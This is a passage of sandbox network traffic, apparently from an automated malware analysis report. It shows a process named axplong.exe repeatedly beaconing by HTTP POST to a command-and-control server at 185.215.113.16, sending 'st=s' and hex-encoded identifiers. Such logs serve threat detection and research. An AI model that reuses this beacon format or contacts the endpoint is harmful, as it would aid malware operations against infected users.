                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:10.276238918 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:10 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    7192.168.2.749714185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:10.385418892 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:11.114334106 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:11.116841078 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:11.455925941 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    8192.168.2.749715185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:11.610433102 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:12.360548019 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:12.361239910 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:12.592092991 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    9192.168.2.749716185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:12.712579012 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:13.454965115 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:13.455728054 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:13.682399035 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    10192.168.2.749717185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:13.790092945 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:14.482147932 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:14.483040094 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:14.704719067 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    11192.168.2.749718185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:14.821867943 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:16.039895058 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:16.039928913 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:16.040036917 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:16.040792942 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:16.265012026 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    12192.168.2.749719185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:16.385524988 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:17.152738094 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:17.153491020 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:17.383819103 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:17 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    13192.168.2.749720185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:17.493264914 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:18.197046041 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:18.229846954 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:18.451353073 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    14192.168.2.749721185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:18.575167894 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:19.322673082 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:19 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:19.323407888 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:19.553539991 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:19 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    15192.168.2.749722185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:19.667047977 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:20.463644981 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:20 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:20.464405060 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:20.696082115 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:20 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    16192.168.2.749723185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:20.840539932 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:21.609952927 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:21 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:21.611404896 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:21.844621897 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:21 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    17192.168.2.749724185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:21.962060928 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:22.690646887 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:22.691354036 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:22.920526028 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    18192.168.2.749725185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:23.041430950 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:23.728781939 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:23 GMT
                    Content-Type: text/html; charset=UTF-8
